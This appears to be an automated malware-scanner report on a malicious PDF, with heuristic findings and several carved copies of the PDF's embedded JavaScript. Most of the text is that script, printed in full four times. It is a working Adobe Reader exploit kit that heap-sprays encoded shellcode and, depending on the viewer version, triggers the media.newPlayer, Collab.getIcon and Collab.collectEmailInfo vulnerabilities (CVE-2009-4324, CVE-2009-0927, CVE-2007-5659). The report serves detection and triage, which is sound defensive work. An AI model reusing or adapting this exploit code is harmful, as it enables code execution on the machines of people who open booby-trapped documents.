MALICIOUS
Risk Score: 412
Malware Insights
MITRE ATT&CK: T1059.001 PowerShell
The PDF file was flagged as malicious by an ML classifier with high confidence. It contains embedded JavaScript, which is a common technique for delivering second-stage malware. The JavaScript stream, named 'javascript_obj0043_000.js', is likely responsible for downloading and executing a malicious payload, although its exact functionality could not be fully determined due to obfuscation.
Machine Learning
- Nyx PDF Classifier: malicious score 0.9988
Heuristics (10)
- media.newPlayer — CVE-2009-4324 [critical, CVE exact match, rule CVE_2009_4324]: PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (matched in decompressed stream)
- Collab.getIcon — CVE-2009-0927 [critical, CVE exact match, rule CVE_2009_0927]: PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (matched in decompressed stream)
- Collab.collectEmailInfo — CVE-2007-5659 [critical, CVE exact match, rule CVE_2007_5659]: PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (matched in decompressed stream)
- JavaScript action [low, 2 related findings, rule PDF_JAVASCRIPT]: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster [critical, rule PDF_JS_EXPLOIT_CLUSTER]: PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior. Matched line in script: try{eval("this.m"+"ed"+"ia.n"+"ewPl"+"ayer(null)");}
- Embedded JS stream [low, rule PDF_JS]: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Generic recovered JavaScript exploit stage [high, rule PDF_GENERIC_STAGE_RECOVERY]: Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
- Object number defined twice with different bodies [info, rule PDF_DUPLICATE_OBJ_BODY_INCREMENTAL]: The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
- Suspicious extracted artifact [info, rule EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info, rule EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in PDF document text)
  - http://ns.adobe.com/pdf/1.3/ (in PDF document text)
  - http://ns.adobe.com/pdfx/1.3/ (in PDF document text)
  - http://ns.adobe.com/xap/1.0/ (in PDF document text)
  - http://ns.adobe.com/xap/1.0/mm/ (in PDF document text)
  - http://purl.org/dc/elements/1.1/ (in PDF document text)
  - http://ns.adobe.com/photoshop/1.0/ (in PDF document text)
Extracted artifacts (7)
Files carved from inside the sample during analysis.

Filename: javascript_obj0043_000.js
Kind: pdf-javascript-stream
Source: PDF /JS object 43 at offset 0x2430
Size: 2172 bytes
SHA-256: 936e2fe1881cc08af3c77ee20ad39a53e4e5331c62787a3c3455c03a63223df6

Preview script (first 1,000 lines of the extracted script):
<</Length 2116/Filter[/FlateDecode]>>stream
[FlateDecode-compressed stream body (2116 bytes of binary data); this carved artifact is the raw compressed /JS object, so its body is not readable as text]
endstrea
Filename: javascript_obj0043_001.js
Kind: pdf-javascript-stream
Source: PDF /JS object 43 at offset 0x2465
Size: 6484 bytes
SHA-256: ad00489fb099dbbe2f8189405c957e21d283c53b58a6f6ac932472b851dd9c9a

Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 21 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).

Preview script (first 1,000 lines of the extracted script):
function urpl(sc){
var keyu= "%u";
var re = /XX/g;
sc = sc.replace(re,keyu);
return sc;
}
function xxsc(sc){
var sprdataxx = "XX4a4bXX4647";
var esprpl=unescape;
var urpled = esprpl(urpl(sc));
var blknum = 0x41000;
var sprdata = esprpl(urpl(sprdataxx));
while(sprdata.length<blknum)
sprdata+=sprdata;
sprblk=sprdata.substring(0,sprdata.length);
scblk=urpled.substring(0,urpled.length);
memory=new Array();
var k = 0;
while (k < 200)
{
memory[k]=sprblk+scblk;
k++;
}
}
function repeat(count,what){
var v = "";
while (--count >= 0) v += what;
return v;
}
var s = "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"
function exp8() {
var spd = "XX000aXX000aXX000aXX000a";
var esc = unescape;
var spr = esc(urpl(spd));
var of = repeat(4096, spr);
var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65"];//javascript comment
Collab["\x67\x65\x74\x49\x63\x6f\x6e"](of+a[0x0]);
}
function exp9() {
var esprpl=unescape;
var sc = esprpl(urpl(s));
var ret = unescape("%u0c0c%u0c0c");
var sc2 = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u6b62%u546e%u596a%u6c76%u506a%u5470%u666f%u7441%u4356%u586c%u726d%u4153%u4b4a%u624c%u7948%u4659%u6156%u7761%u7051%u7842%u5342%u4a64%u6365%u7464%u4972%u5766%u534d%u7569");
while(ret.length <= 0x8000) ret+=ret;
ret=ret.substring(0,0x8000 - s.length);
memory=new Array();
for(i=0;i<0x2000;i++) {
memory[i]= ret + sc;
}
util.printd("jbBFAXmYeqFJUPOXePHkjhAybWoldsgWfmBw", new Date());
util.printd("noCXCPHRXLpZKyNpKJJWxBkvpjKLYwpMfmCG", new Date());
try{eval("this.m"+"ed"+"ia.n"+"ewPl"+"ayer(null)");}
catch(e) {}
util.printd(sc2, new Date());
}
function start()
{
var esprpl=unescape;
var sc = esprpl(urpl(s));
if (app.viewerVersion >= 7.0)
{
plin = repeat(1124,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u0b0b%u0028%u0aeb%u0aeb") + unescape("%u4346%u4a4b") + repeat(122,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u4a4b%u4748%u4a4b%u4748%u4a4b%u4748") + sc + repeat(1256,unescape("%u4a4b%u4748"));
}
else
{
ef6 = unescape("%uf6eb%uf6eb") + unescape("%u0b0b%u0019");
plin = repeat(80,unescape("%u4141%u4141")) + sc + repeat(80,unescape("%u4241%u4142"))+ unescape("%uf7e9%ufff9")
+unescape("%uffff%uffff") + unescape("%uf6eb%uf4eb") + unescape("%uf2eb%uf1eb");
while ((plin.length % 8) != 0)
plin = unescape("%u4141") + plin;
plin += repeat(2626,ef6);
}
if (app.viewerVersion >= 6.0)
{
var a=[];//javascript for adobe
Collab["\x63\x6f\x6c\x6c\x65\x63\x74\x45\x6d\x61\x69\x6c\x49\x6e\x66\x6f"]({subj:a[0x0],msg:plin});
}
}
var ver = app.viewerVersion
if ((ver >= 9.1) || ((ver > 8.102) && (ver < 9.0)))
{
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("exp9()",1200);
else
exp9();
}
else
{
if(ver >= 8.0)
{
xxsc(s);
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("exp8()",1200);
else
exp8();
}
else
{
if(ver >= 6.0)
{
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("start()",1200);
else
start();
}
else
{
while(1){};
}
}
}
Filename: javascript_obj0043_001_shellcode_00.bin
Kind: pdf-js-shellcode
Source: pdf-js-unescape-shellcode recovered from PDF /JS object 43 at offset 0x2465
Size: 72 bytes
SHA-256: 1d18be7a9a735b4efb9816cbf36ca8f2995fa7e3951c97e5ce9977168aa1280b

Filename: generic_stage_recovery_000.js
Kind: deobfuscated-js
Source: generic stage recovery split-literal-normalize from combined JavaScript objects at offset 0x2430
Size: 8645 bytes
SHA-256: 3c763ae8d12646cf96aae88fe53615d8f63f2846394a3d827bfa6698a5af60a2

Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 21 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).

Preview script (first 1,000 lines of the extracted script):
<</Length 2116/Filter[/FlateDecode]>>stream
[FlateDecode-compressed stream body (2116 bytes of binary data) carried over from object 43 at offset 0x2430; not readable as text]
endstrea
function urpl(sc){
var keyu= "%u";
var re = /XX/g;
sc = sc.replace(re,keyu);
return sc;
}
function xxsc(sc){
var sprdataxx = "XX4a4bXX4647";
var esprpl=unescape;
var urpled = esprpl(urpl(sc));
var blknum = 0x41000;
var sprdata = esprpl(urpl(sprdataxx));
while(sprdata.length<blknum)
sprdata+=sprdata;
sprblk=sprdata.substring(0,sprdata.length);
scblk=urpled.substring(0,urpled.length);
memory=new Array();
var k = 0;
while (k < 200)
{
memory[k]=sprblk+scblk;
k++;
}
}
function repeat(count,what){
var v = "";
while (--count >= 0) v += what;
return v;
}
var s = "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"
function exp8() {
var spd = "XX000aXX000aXX000aXX000a";
var esc = unescape;
var spr = esc(urpl(spd));
var of = repeat(4096, spr);
var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65"];//javascript comment
Collab["\x67\x65\x74\x49\x63\x6f\x6e"](of+a[0x0]);
}
function exp9() {
var esprpl=unescape;
var sc = esprpl(urpl(s));
var ret = unescape("%u0c0c%u0c0c");
var sc2 = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u6b62%u546e%u596a%u6c76%u506a%u5470%u666f%u7441%u4356%u586c%u726d%u4153%u4b4a%u624c%u7948%u4659%u6156%u7761%u7051%u7842%u5342%u4a64%u6365%u7464%u4972%u5766%u534d%u7569");
while(ret.length <= 0x8000) ret+=ret;
ret=ret.substring(0,0x8000 - s.length);
memory=new Array();
for(i=0;i<0x2000;i++) {
memory[i]= ret + sc;
}
util.printd("jbBFAXmYeqFJUPOXePHkjhAybWoldsgWfmBw", new Date());
util.printd("noCXCPHRXLpZKyNpKJJWxBkvpjKLYwpMfmCG", new Date());
try{eval("this.media.newPlayer(null)");}
catch(e) {}
util.printd(sc2, new Date());
}
function start()
{
var esprpl=unescape;
var sc = esprpl(urpl(s));
if (app.viewerVersion >= 7.0)
{
plin = repeat(1124,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u0b0b%u0028%u0aeb%u0aeb") + unescape("%u4346%u4a4b") + repeat(122,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u4a4b%u4748%u4a4b%u4748%u4a4b%u4748") + sc + repeat(1256,unescape("%u4a4b%u4748"));
}
else
{
ef6 = unescape("%uf6eb%uf6eb") + unescape("%u0b0b%u0019");
plin = repeat(80,unescape("%u4141%u4141")) + sc + repeat(80,unescape("%u4241%u4142"))+ unescape("%uf7e9%ufff9")
+unescape("%uffff%uffff") + unescape("%uf6eb%uf4eb") + unescape("%uf2eb%uf1eb");
while ((plin.length % 8) != 0)
plin = unescape("%u4141") + plin;
plin += repeat(2626,ef6);
}
if (app.viewerVersion >= 6.0)
{
var a=[];//javascript for adobe
Collab["\x63\x6f\x6c\x6c\x65\x63\x74\x45\x6d\x61\x69\x6c\x49\x6e\x66\x6f"]({subj:a[0x0],msg:plin});
}
}
var ver = app.viewerVersion
if ((ver >= 9.1) || ((ver > 8.102) && (ver < 9.0)))
{
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("exp9()",1200);
else
exp9();
}
else
{
if(ver >= 8.0)
{
xxsc(s);
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("exp8()",1200);
else
exp8();
}
else
{
if(ver >= 6.0)
{
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("start()",1200);
else
start();
}
else
{
while(1){};
}
}
}
Filename: generic_stage_recovery_001.js
Kind: deobfuscated-js
Source: generic stage recovery marker-XX-to-%u from combined JavaScript objects at offset 0x2430
Size: 5859 bytes
SHA-256: aa08a6046c37a2c6bc52361ff13fa9e64c4b6316087d9ec67da6d49f23f8e3a2

Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 21 eval/decoder/string-building token(s).

Preview script (first 1,000 lines of the extracted script):
%u23eb%u4840%u5f43%u5b57%u8b66%u3c03%u7430%u2c1b%uc063%u04e0%uec80%u8043%u0fe4%uc402%uea34%u0788%u4343%ueb47%ue8e3%uffd8%uffff%u4e69%u4963%u4d71%u4571%u4d71%u4d71%u4d6b%u4563%u4d71%u4d71%u4d71%u4d71%u446e%u4e69%u4463%u4967%u4d72%u4d6d%u4d71%u4463%u4d70%u4f72%u526b%u4364%u4d72%u4963%u506a%u4c71%u4971%u4967%u4571%u4366%u4f6c%u4a67%u446a%u4a6c%u4866%u4464%u506a%u4a64%u4871%u476c%u4566%u4b63%u4c6c%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4f67%u4c64%u4e6f%u4d6c%u516b%u4e67%u4d70%u4d71%u4d71%u4d71%u4469%u4d6d%u4971%u4469%u4d6c%u4972%u4a67%u4469%u4d6d%u4571%u4669%u4c69%u4a65%u4d72%u4d6d%u4d71%u4964%u4a69%u4468%u5268%u4d72%u4d6d%u4d71%u4c70%u4665%u4e68%u4f71%u4563%u506f%u4e71%u4d71%u4d71%u4c69%u5065%u5171%u4b63%u4f64%u4964%u4c70%u4d65%u4c70%u4b66%u4f6b%u4368%u476e%u4c65%u4469%u4c68%u4665%u4d72%u4d6d%u4d71%u4f6b%u4469%u4f71%u4f6b%u4470%u4d66%u516c%u5171%u4f6d%u4f6d%u4463%u5164%u4669%u4c68%u4e63%u4d72%u4d6d%u4d71%u4c70%u4f64%u4a68%u4d71%u4d6f%u4d71%u4d71%u4463%u4c72%u436b%u4d71%u4f6e%u4864%u4c6a%u4e65%u4d72%u4d6d%u4d71%u4c69%u4564%u4864%u516c%u5171%u4470%u5265%u506c%u4671%u4f6d%u4e69%u4764%u4d71%u4d72%u4d71%u4d71%u4b6c%u5263%u4669%u4c68%u4666%u4d72%u4d6d%u4d71%u4469%u4563%u5271%u4d71%u4571%u4d71%u4d71%u4d6e%u436b%u4d6d%u4864%u4c6a%u4668%u4d72%u4d6d%u4d71%u4669%u4c69%u4e66%u4d72%u4d6d%u4d71%u4c71%u5265%u4669%u4c69%u5266%u4d72%u4d6d%u4d71%u436b%u4d71%u436b%u4d71%u436b%u4d71%u4864%u4c68%u4666%u4d72%u4d6d%u4d71%u4864%u4c6a%u4a68%u4d72%u4d6d%u4d71%u4469%u4c68%u4e66%u4d72%u4d6d%u4d71%u4a69%u4468%u4a66%u4d72%u4d6d%u4d71%u4469%u4c6a%u4666%u4d72%u4d6d%u4d71%u4a69%u4c69%u5068%u4e72%u4d6d%u4d71%u4d6e%u4f6e%u436b%u4d71%u506e%u526e%u4f6e%u4b6e%u4864%u4c68%u4e63%u4d72%u4d6d%u4d71%u4864%u4c67%u5268%u4d72%u4d6d%u4d71%u4471%u4d65%u526c%u4b71%u4463%u4d6b%u4469%u4c68%u4e66%u4d72%u4d6d%u4d71%u4469%u4f71%u4a70%u526f%u4d6e%u516d%u4f6d%u516c%u4971%u4469%u4c68%u4666%u4d72%u4d6d%u4d71%u4f6d%u4663%u446e%u4864%u4864%u4864%u
4469%u4c68%u4e66%u4d72%u4d6d%u4d71%u4c70%u4665%u4368%u4364%u4464%u4964%u4a64%u4463%u4571%u4469%u4f71%u4470%u4b65%u516c%u4f71%u4f6d%u4e6d%u4470%u4a65%u4b6c%u5164%u4c69%u4f65%u5171%u4469%u4468%u5266%u4d72%u4d6d%u4d71%u4668%u4d71%u5071%u4d71%u4d71%u5167%u4b63%u4a64%u4469%u4468%u4e66%u4d72%u4d6d%u4d71%u4864%u4c68%u4666%u4d72%u4d6d%u4d71%u4864%u4c6a%u5265%u4d72%u4d6d%u4d71%u4864%u4c68%u5266%u4d72%u4d6d%u4d71%u4c65%u4864%u4c68%u4666%u4d72%u4d6d%u4d71%u4864%u4c6a%u5265%u4d72%u4d6d%u4d71%u436b%u4d71%u4864%u4c6a%u4665%u4d72%u4d6d%u4d71%u4c65%u4d6b%u4469%u4c68%u4a65%u4d72%u4d6d%u4d71%u4c71%u4f6c%u4970%u4469%u4f6c%u456c%u4c71%u4c68%u4a65%u4d72%u4d6d%u4d71%u4f6e%u4469%u476d%u4572%u4469%u4f6c%u4d6f%u4c71%u4c68%u4a65%u4d72%u4d6d%u4d71%u4c70%u4d65%u4c70%u4b66%u4f6e%u4469%u4f70%u4c71%u4c68%u4a65%u4d72%u4d6d%u4d71%u4967%u4570%u4d63%u516c%u5071%u4e65%u4365%u4a71%u4c71%u4d66%u4463%u5164%u4470%u5072%u516c%u4671%u476e%u4c69%u4f65%u5171%u466d%u516c%u5270%u4463%u4966%u476e%u4469%u4f66%u476e%u446f%u4f6e%u4d6f%u446f%u4c6a%u4a65%u4d72%u4d6d%u4d71%u4e66%u4363%u4c71%u4f6e%u516f%u4c71%u4c6a%u4a65%u4d72%u4d6d%u4d71%u4871%u5068%u4b71%u4e65%u4d63%u4b71%u4c71%u4f6d%u4972%u4c71%u4c69%u4a65%u4d72%u4d6d%u4d71%u4469%u4d71%u4c71%u4c69%u4a65%u4d72%u4d6d%u4d71%u4669%u5071%u4463%u4e71%u476e%u4e6b%u4c65%u3030"
function exp8() {
var spd = "%u000a%u000a%u000a%u000a";
var esc = unescape;
var spr = esc(urpl(spd));
var of = repeat(4096, spr);
var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65"];//javascript comment
Collab["\x67\x65\x74\x49\x63\x6f\x6e"](of+a[0x0]);
}
function exp9() {
var esprpl=unescape;
var sc = esprpl(urpl(s));
var ret = unescape("%u0c0c%u0c0c");
var sc2 = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u6b62%u546e%u596a%u6c76%u506a%u5470%u666f%u7441%u4356%u586c%u726d%u4153%u4b4a%u624c%u7948%u4659%u6156%u7761%u7051%u7842%u5342%u4a64%u6365%u7464%u4972%u5766%u534d%u7569");
while(ret.length <= 0x8000) ret+=ret;
ret=ret.substring(0,0x8000 - s.length);
memory=new Array();
for(i=0;i<0x2000;i++) {
memory[i]= ret + sc;
}
util.printd("jbBFAXmYeqFJUPOXePHkjhAybWoldsgWfmBw", new Date());
util.printd("noCXCPHRXLpZKyNpKJJWxBkvpjKLYwpMfmCG", new Date());
try{eval("this.m"+"ed"+"ia.n"+"ewPl"+"ayer(null)");}
catch(e) {}
util.printd(sc2, new Date());
}
function start()
{
var esprpl=unescape;
var sc = esprpl(urpl(s));
if (app.viewerVersion >= 7.0)
{
plin = repeat(1124,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u0b0b%u0028%u0aeb%u0aeb") + unescape("%u4346%u4a4b") + repeat(122,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u4a4b%u4748%u4a4b%u4748%u4a4b%u4748") + sc + repeat(1256,unescape("%u4a4b%u4748"));
}
else
{
ef6 = unescape("%uf6eb%uf6eb") + unescape("%u0b0b%u0019");
plin = repeat(80,unescape("%u4141%u4141")) + sc + repeat(80,unescape("%u4241%u4142"))+ unescape("%uf7e9%ufff9")
+unescape("%uffff%uffff") + unescape("%uf6eb%uf4eb") + unescape("%uf2eb%uf1eb");
while ((plin.length % 8) != 0)
plin = unescape("%u4141") + plin;
plin += repeat(2626,ef6);
}
if (app.viewerVersion >= 6.0)
{
var a=[];//javascript for adobe
Collab["\x63\x6f\x6c\x6c\x65\x63\x74\x45\x6d\x61\x69\x6c\x49\x6e\x66\x6f"]({subj:a[0x0],msg:plin});
}
}
var ver = app.viewerVersion
if ((ver >= 9.1) || ((ver > 8.102) && (ver < 9.0)))
{
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("exp9()",1200);
else
exp9();
}
else
{
if(ver >= 8.0)
{
xxsc(s);
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("exp8()",1200);
else
exp8();
}
else
{
if(ver >= 6.0)
{
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("start()",1200);
else
start();
}
else
{
while(1){};
}
}
}
Filename: generic_stage_recovery_002.js
Kind: deobfuscated-js
Source: generic stage recovery split-literal-normalize from JavaScript object 43 at offset 0x2465
Size: 6472 bytes
SHA-256: 3de18d643bbbfed4f5e975007e20182dadadd1ddc7157ec7a58d63e1ae628ffc

Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 21 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).

Preview script (first 1,000 lines of the extracted script):
function urpl(sc){
var keyu= "%u";
var re = /XX/g;
sc = sc.replace(re,keyu);
return sc;
}
function xxsc(sc){
var sprdataxx = "XX4a4bXX4647";
var esprpl=unescape;
var urpled = esprpl(urpl(sc));
var blknum = 0x41000;
var sprdata = esprpl(urpl(sprdataxx));
while(sprdata.length<blknum)
sprdata+=sprdata;
sprblk=sprdata.substring(0,sprdata.length);
scblk=urpled.substring(0,urpled.length);
memory=new Array();
var k = 0;
while (k < 200)
{
memory[k]=sprblk+scblk;
k++;
}
}
function repeat(count,what){
var v = "";
while (--count >= 0) v += what;
return v;
}
var s = "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"
function exp8() {
var spd = "XX000aXX000aXX000aXX000a";
var esc = unescape;
var spr = esc(urpl(spd));
var of = repeat(4096, spr);
var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65"];//javascript comment
Collab["\x67\x65\x74\x49\x63\x6f\x6e"](of+a[0x0]);
}
function exp9() {
var esprpl=unescape;
var sc = esprpl(urpl(s));
var ret = unescape("%u0c0c%u0c0c");
var sc2 = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u6b62%u546e%u596a%u6c76%u506a%u5470%u666f%u7441%u4356%u586c%u726d%u4153%u4b4a%u624c%u7948%u4659%u6156%u7761%u7051%u7842%u5342%u4a64%u6365%u7464%u4972%u5766%u534d%u7569");
while(ret.length <= 0x8000) ret+=ret;
ret=ret.substring(0,0x8000 - s.length);
memory=new Array();
for(i=0;i<0x2000;i++) {
memory[i]= ret + sc;
}
util.printd("jbBFAXmYeqFJUPOXePHkjhAybWoldsgWfmBw", new Date());
util.printd("noCXCPHRXLpZKyNpKJJWxBkvpjKLYwpMfmCG", new Date());
try{eval("this.media.newPlayer(null)");}
catch(e) {}
util.printd(sc2, new Date());
}
function start()
{
var esprpl=unescape;
var sc = esprpl(urpl(s));
if (app.viewerVersion >= 7.0)
{
plin = repeat(1124,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u0b0b%u0028%u0aeb%u0aeb") + unescape("%u4346%u4a4b") + repeat(122,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u4a4b%u4748%u4a4b%u4748%u4a4b%u4748") + sc + repeat(1256,unescape("%u4a4b%u4748"));
}
else
{
ef6 = unescape("%uf6eb%uf6eb") + unescape("%u0b0b%u0019");
plin = repeat(80,unescape("%u4141%u4141")) + sc + repeat(80,unescape("%u4241%u4142"))+ unescape("%uf7e9%ufff9")
+unescape("%uffff%uffff") + unescape("%uf6eb%uf4eb") + unescape("%uf2eb%uf1eb");
while ((plin.length % 8) != 0)
plin = unescape("%u4141") + plin;
plin += repeat(2626,ef6);
}
if (app.viewerVersion >= 6.0)
{
var a=[];//javascript for adobe
Collab["\x63\x6f\x6c\x6c\x65\x63\x74\x45\x6d\x61\x69\x6c\x49\x6e\x66\x6f"]({subj:a[0x0],msg:plin});
}
}
var ver = app.viewerVersion
if ((ver >= 9.1) || ((ver > 8.102) && (ver < 9.0)))
{
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("exp9()",1200);
else
exp9();
}
else
{
if(ver >= 8.0)
{
xxsc(s);
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("exp8()",1200);
else
exp8();
}
else
{
if(ver >= 6.0)
{
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("start()",1200);
else
start();
}
else
{
while(1){};
}
}
}
Filename: generic_stage_recovery_003.js
Kind: deobfuscated-js
Source: generic stage recovery split-literal-normalize -> marker-XX-to-%u from combined JavaScript objects at offset 0x2430
Size: 5847 bytes
SHA-256: 426159a7abbfc96cfc9f011196abdb71becccce0b83f6ff9457fc5766c986452

Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 21 eval/decoder/string-building token(s).

Preview script (first 1,000 lines of the extracted script):
%u23eb%u4840%u5f43%u5b57%u8b66%u3c03%u7430%u2c1b%uc063%u04e0%uec80%u8043%u0fe4%uc402%uea34%u0788%u4343%ueb47%ue8e3%uffd8%uffff%u4e69%u4963%u4d71%u4571%u4d71%u4d71%u4d6b%u4563%u4d71%u4d71%u4d71%u4d71%u446e%u4e69%u4463%u4967%u4d72%u4d6d%u4d71%u4463%u4d70%u4f72%u526b%u4364%u4d72%u4963%u506a%u4c71%u4971%u4967%u4571%u4366%u4f6c%u4a67%u446a%u4a6c%u4866%u4464%u506a%u4a64%u4871%u476c%u4566%u4b63%u4c6c%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4f67%u4c64%u4e6f%u4d6c%u516b%u4e67%u4d70%u4d71%u4d71%u4d71%u4469%u4d6d%u4971%u4469%u4d6c%u4972%u4a67%u4469%u4d6d%u4571%u4669%u4c69%u4a65%u4d72%u4d6d%u4d71%u4964%u4a69%u4468%u5268%u4d72%u4d6d%u4d71%u4c70%u4665%u4e68%u4f71%u4563%u506f%u4e71%u4d71%u4d71%u4c69%u5065%u5171%u4b63%u4f64%u4964%u4c70%u4d65%u4c70%u4b66%u4f6b%u4368%u476e%u4c65%u4469%u4c68%u4665%u4d72%u4d6d%u4d71%u4f6b%u4469%u4f71%u4f6b%u4470%u4d66%u516c%u5171%u4f6d%u4f6d%u4463%u5164%u4669%u4c68%u4e63%u4d72%u4d6d%u4d71%u4c70%u4f64%u4a68%u4d71%u4d6f%u4d71%u4d71%u4463%u4c72%u436b%u4d71%u4f6e%u4864%u4c6a%u4e65%u4d72%u4d6d%u4d71%u4c69%u4564%u4864%u516c%u5171%u4470%u5265%u506c%u4671%u4f6d%u4e69%u4764%u4d71%u4d72%u4d71%u4d71%u4b6c%u5263%u4669%u4c68%u4666%u4d72%u4d6d%u4d71%u4469%u4563%u5271%u4d71%u4571%u4d71%u4d71%u4d6e%u436b%u4d6d%u4864%u4c6a%u4668%u4d72%u4d6d%u4d71%u4669%u4c69%u4e66%u4d72%u4d6d%u4d71%u4c71%u5265%u4669%u4c69%u5266%u4d72%u4d6d%u4d71%u436b%u4d71%u436b%u4d71%u436b%u4d71%u4864%u4c68%u4666%u4d72%u4d6d%u4d71%u4864%u4c6a%u4a68%u4d72%u4d6d%u4d71%u4469%u4c68%u4e66%u4d72%u4d6d%u4d71%u4a69%u4468%u4a66%u4d72%u4d6d%u4d71%u4469%u4c6a%u4666%u4d72%u4d6d%u4d71%u4a69%u4c69%u5068%u4e72%u4d6d%u4d71%u4d6e%u4f6e%u436b%u4d71%u506e%u526e%u4f6e%u4b6e%u4864%u4c68%u4e63%u4d72%u4d6d%u4d71%u4864%u4c67%u5268%u4d72%u4d6d%u4d71%u4471%u4d65%u526c%u4b71%u4463%u4d6b%u4469%u4c68%u4e66%u4d72%u4d6d%u4d71%u4469%u4f71%u4a70%u526f%u4d6e%u516d%u4f6d%u516c%u4971%u4469%u4c68%u4666%u4d72%u4d6d%u4d71%u4f6d%u4663%u446e%u4864%u4864%u4864%u
4469%u4c68%u4e66%u4d72%u4d6d%u4d71%u4c70%u4665%u4368%u4364%u4464%u4964%u4a64%u4463%u4571%u4469%u4f71%u4470%u4b65%u516c%u4f71%u4f6d%u4e6d%u4470%u4a65%u4b6c%u5164%u4c69%u4f65%u5171%u4469%u4468%u5266%u4d72%u4d6d%u4d71%u4668%u4d71%u5071%u4d71%u4d71%u5167%u4b63%u4a64%u4469%u4468%u4e66%u4d72%u4d6d%u4d71%u4864%u4c68%u4666%u4d72%u4d6d%u4d71%u4864%u4c6a%u5265%u4d72%u4d6d%u4d71%u4864%u4c68%u5266%u4d72%u4d6d%u4d71%u4c65%u4864%u4c68%u4666%u4d72%u4d6d%u4d71%u4864%u4c6a%u5265%u4d72%u4d6d%u4d71%u436b%u4d71%u4864%u4c6a%u4665%u4d72%u4d6d%u4d71%u4c65%u4d6b%u4469%u4c68%u4a65%u4d72%u4d6d%u4d71%u4c71%u4f6c%u4970%u4469%u4f6c%u456c%u4c71%u4c68%u4a65%u4d72%u4d6d%u4d71%u4f6e%u4469%u476d%u4572%u4469%u4f6c%u4d6f%u4c71%u4c68%u4a65%u4d72%u4d6d%u4d71%u4c70%u4d65%u4c70%u4b66%u4f6e%u4469%u4f70%u4c71%u4c68%u4a65%u4d72%u4d6d%u4d71%u4967%u4570%u4d63%u516c%u5071%u4e65%u4365%u4a71%u4c71%u4d66%u4463%u5164%u4470%u5072%u516c%u4671%u476e%u4c69%u4f65%u5171%u466d%u516c%u5270%u4463%u4966%u476e%u4469%u4f66%u476e%u446f%u4